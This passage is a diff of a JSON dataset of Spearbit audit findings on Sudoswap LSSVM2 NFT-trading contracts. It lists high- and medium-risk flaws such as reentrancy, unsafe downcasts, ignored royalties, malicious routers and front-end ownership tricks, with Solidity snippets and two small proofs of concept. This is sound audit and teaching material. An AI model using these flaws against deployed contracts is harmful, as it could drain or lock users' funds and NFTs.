"Severity: High Risk" ] }, { - "title": "Missing array length equality checks may lead to incorrect or undefined behavior", + "title": "Royalty not always being taken into account leads to incorrect protocol accounting", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions taking two array type parameters and not checking that their lengths are equal may lead to incorrect or undefined behavior when accidentally passing arrays of unequal lengths.", + "body": "The function getSellNFTQuoteWithRoyalties() is similar to getSellNFTQuote(), except that it also takes the royalties into account. When the function robustSwapNFTsForToken() of the LSSVMRouter is called, it first calls getSellNFTQuote() and checks that a sufficient amount of tokens will be received.
Then it calls swapNFTsForToken() with 0 as minExpectedTokenOutput, so it will accept any amount of tokens. swapNFTsForToken() does subtract the royalties, which will result in a lower amount of tokens received and might not be enough to satisfy the requirements of the seller. The same happens in robustSwapETHForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken. Note: Function getSellNFTQuote() of StandardSettings.sol also uses getSellNFTQuote(). However, there it is compared to the results of getBuyInfo(), so this is ok as both don't take the royalties into account. Note: getNFTQuoteForSellOrderWithPartialFill() also has to take royalties into account. function getSellNFTQuote(uint256 numNFTs) ... { (..., outputAmount, ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(uint256 assetId, uint256 numNFTs) ... { (..., outputAmount, ... ) = bondingCurve().getSellInfo(...); (,, uint256 royaltyTotal) = _calculateRoyaltiesView(assetId, outputAmount); ... outputAmount -= royaltyTotal; } function robustSwapNFTsForToken(...) ... { ... (error,,, pairOutput,) = swapList[i].swapInfo.pair.getSellNFTQuote(swapList[i].swapInfo.nftIds.length); ... if (pairOutput >= swapList[i].minOutput) { ....swapNFTsForToken(..., 0, ...); } ... } function swapNFTsForToken(...) ... { ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(numNFTs[0], _bondingCurve, _factory); (... royaltyTotal) = _calculateRoyalties(nftId(), outputAmount); ... outputAmount -= royaltyTotal; ... _sendTokenOutput(tokenRecipient, outputAmount); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Owners may have funds locked if newOwner is EOA in transferOwnership()", + "title": "Error return codes of getBuyInfo() and getSellInfo() are sometimes ignored", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In transferOwnership(), if newOwner has zero code.length (i.e. is an EOA), newOwner.isContract() will be false and therefore the if block will be skipped. As the function is payable, any msg.value from the call would get locked in the contract. Note: ERC20 pairs and StandardSettings don't have a method to recover ETH.", + "body": "The functions getBuyInfo() and getSellInfo() return an error code when they detect an error. The rest of the returned parameters then have an unusable/invalid value (0). However, some callers of these functions ignore the error code and continue processing with the other unusable/invalid values. The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() pass through the error code, so their callers have to check the error codes too. function getBuyInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getSellInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getBuyNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ...
) = bondingCurve().getSellInfo(...); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Use of transferFrom may lead to NFTs getting locked forever", + "title": "changeSpotPriceAndDelta() only uses ERC721 version of balanceOf()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "ERC721 NFTs may get locked forever if the recipient is not aware of ERC721 for some reason. While safeTransferFrom() is used for ERC1155 NFTs (which has the _doSafeTransferAcceptanceCheck check on the recipient and does not have an option to avoid this), transferFrom() is used for ERC721 NFTs, presumably for gas savings and reentrancy concerns over its safeTransferFrom variant (which has the _checkOnERC721Received check on the recipient).", + "body": "The function changeSpotPriceAndDelta() uses balanceOf() with one parameter. This is the ERC721 variant. In order to support ERC1155, a second parameter with the NFT id has to be supplied. function changeSpotPriceAndDelta(address pairAddress, ...) public { ... if ((newPriceToBuyFromPair < priceToBuyFromPair) && pair.nft().balanceOf(pairAddress) >= 1) { ... } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Single-step ownership change introduces risks", + "title": "_pullTokenInputAndPayProtocolFee() doesn't check that tokens are received", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Single-step ownership transfers add the risk of setting an unwanted owner by accident (this includes address(0)) if the ownership transfer is not done with excessive care. The ownership control library Owned by Solmate implements a simple single-step ownership transfer without zero-address checks.", + "body": "The function _pullTokenInputAndPayProtocolFee() doesn't verify that it actually received the tokens after doing safeTransferFrom(). This can be an issue with fee-on-transfer tokens. This is also an issue with (accidentally) non-existing tokens, as safeTransferFrom() won't revert on that, see the POC below. Note: also see issue \"Malicious router mitigation may break for deflationary tokens\". function _pullTokenInputAndPayProtocolFee(...) ... { ... _token.safeTransferFrom(msg.sender, _assetRecipient, saleAmount); ... } Proof Of Concept: // SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import \"hardhat/console.sol\"; import {ERC20} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/tokens/ERC20.sol\"; import {SafeTransferLib} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/SafeTransferLib.sol\"; contract test { using SafeTransferLib for ERC20; function t() public { ERC20 _token = ERC20(address(1)); _token.safeTransferFrom(msg.sender, address(0), 100); console.log(\"after safeTransferFrom\"); } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "getAllPairsForSettings() may run out of gas", + "title": "A malicious settings contract can call onOwnershipTransferred() to take over pair", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function getAllPairsForSettings() has a loop over pairsForSettings. As the creation of pairs is permissionless, that array could get arbitrarily large.
Once the array is large enough, the function will run out of gas. Note: the function is only called from the outside. function getAllPairsForSettings(address settings) external view returns (address[] memory) { uint256 numPairs = pairsForSettings[settings].length(); ... for (uint256 i; i < numPairs;) { ... unchecked { ++i; } } ... }", + "body": "The function onOwnershipTransferred() can be called from a pair via call(). This can be done either before transferOwnership() or after it. If it is called before, then it updates the AssetRecipient. It can only be called after transferOwnership() when an alternative (malicious) settings contract is used. In that situation pairInfos[] is overwritten and the original owner is lost, so effectively the pair can be taken over. Note: if the settings contract is malicious then there are different ways to take over the pair, but using this approach the vulnerabilities can be hidden. function onOwnershipTransferred(address prevOwner, bytes memory) public payable { ILSSVMPair pair = ILSSVMPair(msg.sender); require(pair.poolType() == ILSSVMPair.PoolType.TRADE, \"Only TRADE pairs\"); ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "Partially implemented SellOrderWithPartialFill functionality may cause unexpected behavior", + "title": "One can attempt to steal a pair's ETH", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Partial fills for sell orders come into play unless pair.spotPrice() == order.expectedSpotPrice in a swap. This may be confusing to users who expect partial fills in both directions but notice unexpected behavior if deployed as-is. While the BuyOrderWithPartialFill functionality is fully implemented, the corresponding SellOrderWithPartialFill feature is only partially implemented, with getNFTQuoteForSellOrderWithPartialFill, an incomplete _findMaxFillableAmtForSell (placeholder comment: \"// TODO: implement\") and other supporting logic required in swap().", + "body": "Anyone can pass the enrolled pair's address instead of a splitter address in bulkWithdrawFees() to effectively call the pair's withdrawAllETH() instead of a splitter's withdrawAllETH(). Anyone can attempt to steal/drain all the ETH from a pair. However, the pair's withdrawAllETH() sends ETH to the owner, which in this case is the settings contract. The settings contract is unable to receive ETH as currently implemented. So the attempt reverts.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "Lack of deadline checks for certain swap functions allows greater exposure to volatile market prices", + "title": "swap() could mix tokens with ETH", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Many swap functions in LSSVMRouter use the checkDeadline modifier to prevent swaps from executing beyond a certain user-specified deadline. This is presumably to reduce exposure to volatile market prices on top of the thresholds of maxCost for buys and minOutput for sells. However, two router functions, robustSwapETHForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken in LSSVMRouter, and all functions in VeryFastRouter are missing this modifier and the user parameter required for it.
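For reference, a minimal sketch of such a guard, following the common deadline pattern (names assumed):

modifier checkDeadline(uint256 deadline) {
    // reject transactions mined after the user-specified deadline
    require(block.timestamp <= deadline, \"Deadline passed\");
    _;
}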
Users attempting to swap using these two swap functions do not have a way to specify a deadline for their execution, unlike the other swap functions in this router. If the front-end does not highlight or warn about this, then the user swaps may get executed after a long time, depending on the tip included in the transaction and the network congestion. This causes greater exposure for the swaps to volatile market prices.", + "body": "The function swap() adds the output of swapNFTsForToken() to the ethAmount. Although this only happens when order.isETHSell == true, this value could be set to the wrong value accidentally or on purpose. Then the number of received ERC20 tokens could be added to the ethAmount, which is clearly unwanted. The resulting ethAmount is returned to the user. Luckily the router (normally) doesn't have extra ETH, so the impact should be limited. function swap(Order calldata swapOrder) external payable { uint256 ethAmount = msg.value; if (order.isETHSell && swapOrder.recycleETH) { ... outputAmount = pair.swapNFTsForToken(...); ... ethAmount += outputAmount; ... } ... // Send excess ETH back to token recipient if (ethAmount > 0) { payable(swapOrder.tokenRecipient).safeTransferETH(ethAmount); } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "Missing function to deposit ERC1155 NFTs after pair creation", + "title": "Using a single tokenRecipient in VeryFastRouter could result in locked NFTs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions depositNFTs() and depositERC20() are apparently used to deposit ERC721 NFTs and ERC20s into appropriate pairs after their creation. According to the project team, this is used \"for various UIs to consolidate approvals + emit a canonical event for deposits.\" However, an equivalent function for depositing ERC1155 NFTs is missing. This prevents ERC1155 NFTs from being deposited into pairs after creation for scenarios similar to those anticipated for ERC721 NFTs and ERC20 tokens.", + "body": "VeryFastRouter uses a single tokenRecipient address for both ETH/tokens and NFTs, unlike LSSVMRouter which uses a separate tokenRecipient and nftRecipient. It is error-prone to have a single tokenRecipient receive both tokens and NFTs, especially when the other/existing LSSVMRouter has a separate nftRecipient. VeryFastRouter.swap() sends both sell order tokens to tokenRecipient and buy order NFTs to tokenRecipient. Front-ends integrating with both routers (or migrating to the new one) may surprise users by sending both tokens+NFTs to the same address when interacting with this router. This, coupled with the use of nft.transferFrom(), may result in NFTs being sent to contracts that are not ERC-721 receivers and getting them locked forever.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "Reading from state is more gas expensive than using msg.sender", + "title": "Owner can mislead users by abusing changeSpotPrice() and changeDelta()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Solmate's Owned.sol contract implements the concept of ownership (by saving the deployer in the owner state variable during contract construction) and owner-exclusive functions via the onlyOwner() modifier.
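For reference, Solmate's ownership check is essentially:

modifier onlyOwner() virtual {
    require(msg.sender == owner, \"UNAUTHORIZED\");
    _;
}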
Therefore, within functions protected by the onlyOwner() modifier, the addresses stored in msg.sender and owner will be equal. So, if such a function has to make use of the address of the owner, it is cheaper to use msg.sender than owner, because the latter reads from the contract state (using the SLOAD opcode) while the former doesn't (the address is directly retrieved via the cheaper CALLER opcode). Reading from state (SLOAD opcode, which costs either 100 or 2100 gas units) costs more gas than using the msg.sender environment variable (CALLER opcode, which costs 2 units of gas). Note: withdrawERC20() already uses msg.sender. function withdrawETH(uint256 amount) public onlyOwner { payable(owner()).safeTransferETH(amount); ... } function withdrawERC20(ERC20 a, uint256 amount) external override onlyOwner { a.safeTransfer(msg.sender, amount); }", + "body": "A malicious owner could set up a pair which promises to buy NFTs for high prices. As soon as someone tries to trade, the owner could frontrun the transaction by setting the spot price to 0 and get the NFT for free. Both changeSpotPrice() and changeDelta() can be used to immediately change trade parameters, where the aftereffects depend on the curve being used. Note: The swapNFTsForToken() parameter minExpectedTokenOutput and the swapTokenForSpecificNFTs() parameter maxExpectedTokenInput protect users against sudden price changes. But users might not always set them in an optimal way. A design goal of the project team is that the pool owner can quickly respond to changing market conditions, to prevent unnecessary losses. function changeSpotPrice(uint128 newSpotPrice) external onlyOwner { ... } function changeDelta(uint128 newDelta) external onlyOwner { ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "pair.factory().protocolFeeMultiplier() is read from storage on every iteration of the loop wasting gas", + "title": "Pair may receive less ETH trade fees than expected under certain conditions", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Not caching storage variables that are accessed multiple times within a loop causes waste of gas. If not cached, the Solidity compiler will always read the value of protocolFeeMultiplier from storage during each iteration. For a storage variable, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory variable, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first).", + "body": "Depending on the values of the protocol fee and royalties, if _feeRecipient == _assetRecipient, the pair will receive less trade fees than expected. Assume a scenario where inputAmount == 100, protocolFee == 30, royaltyTotal == 60 and tradeFeeAmount == 20. This will result in a revert because of underflow in saleAmount -= tradeFeeAmount; when _feeRecipient != _assetRecipient.
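Working through those numbers: saleAmount = 100 - 30 (protocolFee) - 60 (royaltyTotal) = 10, so the subsequent saleAmount -= tradeFeeAmount computes 10 - 20 and underflows.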
However, when _feeRecipient == _assetRecipient, the pair will receive trade fees of 100 - 30 - 60 = 10, whereas it normally would have expected 20.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "The use of factory in ERC1155._takeNFTsFromSender() can be via a parameter rather than calling factory() again", + "title": "Swapping tokens/ETH for NFTs may exhibit unexpected behavior for certain values of input amount, trade fees and royalties", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "factory is being sent as a parameter to _takeNFTsFromSender in LSSVMPairERC721.sol#L179, which saves gas because it is not required to read the value again. _takeNFTsFromSender(IERC721(nft()), nftIds, _factory, isRouter, routerCaller); However, in LSSVMPairERC1155.sol#L181, the similar function _takeNFTsFromSender() gets the value by calling factory() instead of using a parameter. _takeNFTsFromSender(IERC1155(nft()), numNFTs[0], isRouter, routerCaller); This creates an unnecessary asymmetry between the two contracts, which are expected to be similar, and misses a possible gas optimization by avoiding a call to the factory getter.", + "body": "The _pullTokenInputAndPayProtocolFee() function pulls ERC20/ETH from the caller/router and pays protocol fees, trade fees and royalties proportionately. Trade fees have a threshold of MAX_FEE == 50%, which allows 2*fee to be 100%. Royalty amounts could technically be any percentage as well. This allows edge cases where the protocol fee, trade fee and royalty amounts add up to be > inputAmount. In LSSVMPairERC20, the ordering of subtracting/transferring the protocolFee and royaltyTotal first causes the final attempted transfer of tradeFeeAmount to either revert because of unavailable funds or use any balance funds from the pair itself. In LSSVMPairETH, the ordering of subtracting/transferring the tradeFees and royaltyTotal first causes the final attempted transfer of protocolFee to either revert because of unavailable funds or use any balance funds from the pair itself.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Variables only set at construction time could be made immutable", + "title": "NFTs may be exchanged for 0 tokens when price decreases too much", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "immutable variables can be assigned either at construction time or at declaration time, and only once. The contract creation code generated by the compiler will modify the contract's runtime code before it is returned by replacing all references to immutable variables with the values assigned to them; so the compiler does not reserve a storage slot for these variables. Declaring variables only set at construction time as immutable saves one call per variable to the SSTORE (0x55) opcode, thus saving gas during construction.", + "body": "The sale of multiple NFTs, in combination with linear curves, results in a price decrease. When the resulting price is below 0, getSellInfo() calculates how many NFTs are required to reach a price of 0. However, the complete number of NFTs is transferred from the originator of the transaction, even while the last few NFTs are worth 0. This might be undesirable for the originator. function getSellInfo(..., uint256 numItems, ...
) ... { ... uint256 totalPriceDecrease = delta * numItems; if (spotPrice < totalPriceDecrease) { ... uint256 numItemsTillZeroPrice = spotPrice / delta + 1; numItems = numItemsTillZeroPrice; } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Hoisting check out of loop will save gas", + "title": "balanceOf() can be circumvented via reentrancy and two pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The check numIdsFound == maxIdsNeeded will never be true before the outer for loop finishes iterating over maxIdsNeeded, because numIdsFound is conditionally incremented only by 1 in each iteration.", + "body": "A reentrancy issue can occur if two pairs with the same ERC1155 NFT id are deployed. Via a call to swap NFTs, the ERC1155 callback onERC1155BatchReceived() is called. This callback can start a second NFT swap via a second pair. As the second pair has its own reentrancy modifier, this is allowed. This way the balanceOf() check of _takeNFTsFromSender() can be circumvented. If a reentrant call to a second pair supplies a sufficient amount of NFTs, then the balanceOf() check of the original call can be satisfied at the same time. We haven't found a realistic scenario to abuse this with the current routers. Permissionless routers will certainly increase the risk as they can abuse isRouter == true. If the router is malicious then it also has other ways to steal the NFTs; however, with the reentrancy scenario it might be less obvious this is happening. Note: ERC777 tokens also contain such a callback and have the same interface as ERC20, so they could be used in an ERC20 pair. function _takeNFTsFromSender(IERC1155 _nft, uint256 numNFTs, bool isRouter, address routerCaller) ... { ... if (isRouter) { ... uint256 beforeBalance = _nft.balanceOf(_assetRecipient, _nftId); ... router.pairTransferERC1155From(...); // reentrancy with other pair require((_nft.balanceOf(_assetRecipient, _nftId) - beforeBalance) == numNFTs, ...); // circumvented } else { ... } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Functionality of safeBatchTransferFrom() is not used", + "title": "Function call() is risky and can be restricted further", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function pairTransferERC1155From() allows the transfer of multiple ids of ERC1155 NFTs. The rest of the code only uses one id at a time. Using safeTransferFrom() instead of safeBatchTransferFrom() might be better, as it only accesses one id and uses less gas because no for loop is necessary. However, future versions of Sudoswap might support multiple ids; in that case it's better to leave it as is. function pairTransferERC1155From(..., uint256[] calldata ids, uint256[] calldata amounts,...) ... { ... nft.safeBatchTransferFrom(from, to, ids, amounts, bytes(\"\")); }", + "body": "The function call() is powerful and thus risky. To reduce the risk it can be restricted further by disallowing potentially dangerous function selectors. This is also a step closer to introducing permissionless routers.
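One possible shape for such a restriction (the bannedSelectors set is hypothetical, shown only to illustrate the idea):

function call(address payable target, bytes calldata data) external onlyOwner {
    // block selectors that could move approvals or ownership (e.g. approve, setApprovalForAll)
    require(data.length >= 4 && !bannedSelectors[bytes4(data[:4])], \"Selector not allowed\");
    // ... existing whitelist check and external call
}

For reference, the current implementation: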
function call(address payable target, bytes calldata data) external onlyOwner { ILSSVMPairFactoryLike _factory = factory(); require(_factory.callAllowed(target), \"Target must be whitelisted\"); (bool result,) = target.call{value: 0}(data); require(result, \"Call failed\"); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Using != 0 instead of > 0 can save gas", + "title": "Incorrect newSpotPrice and newDelta may be obtained due to unsafe downcasts", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "When dealing with unsigned integer types, comparisons with != 0 are 3 gas cheaper than > 0.", + "body": "When calculating newSpotPrice in getBuyInfo(), an unsafe downcast from uint256 into uint128 may occur and silently overflow, leading to a much smaller value for newSpotPrice than expected. function getBuyInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 inputValue, uint256 tradeFee, uint256 protocolFee ) { ... // get the pair's virtual nft and token reserves uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // calculate the amount to send in uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... // set the new virtual reserves newSpotPrice = uint128(spotPrice + inputValueWithoutFee); // token reserve ... } The same happens when calculating newDelta in getSellInfo(): function getSellInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 outputValue, uint256 tradeFee, uint256 protocolFee ) { ... // get the pair's virtual nft and eth/erc20 balance uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // set the new virtual reserves newDelta = uint128(nftBalance + numItems); // nft reserve ... } Proof of concept showing how this wouldn't revert but silently overflow: import \"hardhat/console.sol\"; contract test { constructor() { uint256 a = type(uint128).max; uint256 b = 2; uint128 c = uint128(a + b); console.log(c); // c == 1, no error } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Using >>1 instead of /2 can save gas", + "title": "Fewer checks in pairTransferNFTFrom() and pairTransferERC1155From() than in pairTransferERC20From()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A division by 2 can be calculated by shifting one to the right (>>1). While the DIV opcode uses 5 gas, the SHR opcode only uses 3 gas.", + "body": "The functions pairTransferNFTFrom() and pairTransferERC1155From() don't verify that the correct type of pair is used, whereas pairTransferERC20From() does. This means actions could be attempted on the wrong type of pairs. These could succeed, for example, if an NFT is used that supports both ERC721 and ERC1155. Note: also see issue \"pairTransferERC20From only supports ERC721 NFTs\". The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ...
require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, \"Not ERC20 pair\"); ... } function pairTransferNFTFrom(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferERC1155From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Retrieval of ether balance of contract can be gas optimized", + "title": "A malicious collection admin can reclaim a pair at any time to deny enhanced setting royalties", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The retrieval of the ether balance of a contract is typically done with address(this).balance. However, by using an assembly block and the selfbalance() instruction, one can get the balance with a discount of 15 units of gas.", + "body": "A collection admin can forcibly/selectively call reclaimPair() prematurely (before the advertised and agreed-upon lockup period) to unilaterally break the settings contract at any time. This will effectively lead to a DoS for the pair owner with respect to the enhanced royalty terms of the setting, despite paying the upfront fee and agreeing to a fee split in return. This is because the unlockTime is enforced only on the previous pair owner and not on collection admins. A malicious collection admin can advertise very attractive setting royalty terms to entice pair owners to pay a high upfront fee to sign up for their settings contract, but then force-end the contract prematurely. This will lead to the pair owner losing the paid upfront fee and the promised attractive royalty terms. A lax pair owner who may not be actively monitoring SettingsRemovedForPair events before the lockup period will be surprised by the prematurely forced settings contract termination by the collection admin, the loss of their earlier paid upfront fee and any payments of default royalty instead of their expected enhanced amounts.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Function parameters should be validated at the very beginning for gas optimizations", + "title": "PropertyCheckers and Settings not sufficiently restricted", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Function parameters should be validated at the very beginning of the function to allow typical execution paths and revert on the exceptional paths, which will lead to gas savings over validating later.", + "body": "The LSSVMPairFactory accepts any address for external contracts which contain critical logic, but there are no sanity checks done on them. These are the _bondingCurve, _propertyChecker and settings contracts. The contracts could perhaps be updated later via a proxy pattern or a create2/selfdestruct pattern, which means that it's difficult to completely rely on them. Both the _propertyChecker and settings contracts have a factory associated: PropertyCheckerFactory and StandardSettingsFactory. It is straightforward to enforce that only contracts created by the factory can be used. For the bondingCurves there is a whitelist that limits the risk. function createPairERC721ETH(..., ICurve _bondingCurve, ..., address _propertyChecker, ...) ... { ...
// no checks on _bondingCurve and _propertyChecker } function toggleSettingsForCollection(address settings, address collectionAddress, bool enable) public { ... // no checks on settings } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner { bondingCurveAllowed[bondingCurve] = isAllowed; emit BondingCurveStatusUpdate(bondingCurve, isAllowed); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Loop counters are not gas optimized in some places", + "title": "A malicious router can skip transfer of royalties and protocol fee", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Loop counters are optimized in many parts of the code by using an unchecked {++i} (unchecked + prefix increment). However, this is not done in some places where it is safe to do so.", + "body": "A malicious router, if accidentally/intentionally whitelisted by the protocol, may implement pairTransferERC20From() functions which do not actually transfer the number of tokens as expected. This is within the protocol's threat model, as evidenced by the use of before-after balance checks on the _assetRecipient for saleAmount. However, similar before-after balance checks are missing for transfers of royalties and protocol fee payments. Royalty recipients do not receive their royalties from the malicious router if the protocol/factory intentionally/accidentally whitelists one. The protocol/factory may also accidentally whitelist a malicious router that does not transfer even the protocol fee.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization MerklePropertyChecker.sol#L22," + "Severity: Medium Risk" ] }, { - "title": "Mixed use of custom errors and revert strings is inconsistent and uses extra gas", + "title": "Malicious front-end can sneak intermediate ownership changes to perform unauthorized actions", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In some parts of the code, custom errors are declared and later used (CurveErrorCodes and Ownable Errors), while in other parts, classic revert strings are used in require statements. Instead of using error strings, custom errors can be used, which would reduce deployment and runtime costs. Using only custom errors would improve consistency and gas cost. This would also avoid long revert strings which consume extra gas. Each extra memory word of bytes past the original 32 incurs an MSTORE which costs 3 gas. This happens at LSSVMPair.sol#L133, LSSVMPair.sol#L666 and LSSVMPairFactory.sol#L505.", + "body": "LSSVMPair implements an onlyOwner multicall function to allow the owner to batch multiple calls. Natspec indicates that this is \"Intended for withdrawing/altering pool pricing in one tx, only callable by owner, cannot change owner.\" The check require(owner() == msg.sender, \"Ownership cannot be changed in multicall\"); with a preceding comment \"Prevent multicall from malicious frontend sneaking in ownership change\" indicates the intent of the check and that a malicious front-end is within the threat model. 
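As a hedged illustration of the attack window (the onOwnershipTransferred() callback follows the report; the interface and attacker contract below are assumptions, not the audited code):
interface IPair {
    function transferOwnership(address newOwner, bytes calldata data) external payable;
}
contract MaliciousNewOwner {
    address immutable originalOwner;
    constructor(address originalOwner_) { originalOwner = originalOwner_; }
    function onOwnershipTransferred(address, bytes memory) external payable {
        // while this contract is (temporarily) the owner, unauthorized actions can run here;
        // handing ownership straight back makes the post-loop owner() == msg.sender check pass
        IPair(msg.sender).transferOwnership(originalOwner, bytes(\"\"));
    }
}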
While the post-loop check prevents malicious front-ends from executing ownership-changing calls that attempt to persist beyond the multicall, this still allows one to sneak in an intermediate ownership change during a call -> perform malicious actions under the new unauthorized malicious owner within the onOwnershipTransferred() callback -> change ownership back to the originally authorized msg.sender owner before returning from the callback, so that any subsequent (onlyOwner) calls and the existing check still succeed. While a malicious front-end could introduce many attack vectors that are out-of-scope for detecting/preventing in backend contracts, an unauthorized ownership change seems like a critical one and warrants additional checks for the onlyOwner multicall to prevent malicious actions from being executed in the context of any newly/temporarily unauthorized owner.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Array length read in each iteration of the loop wastes gas", + "title": "Missing override in authAllowedForToken prevents authorized admins from toggling settings and reclaiming pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "If not cached, the Solidity compiler will always read the length of the array from storage during each iteration. For a storage array, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory array, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first).", + "body": "Manifold admins are incorrectly not allowed by authAllowedForToken to toggle settings and reclaim their authorized pairs in the protocol context. authAllowedForToken checks for different admin overrides, including the admin interfaces of the NFT marketplaces Nifty, Foundation, Digitalax and ArtBlocks. However, the protocol supports royalties from the other marketplaces Manifold, Rarible, SuperRare and Zora. Of those, 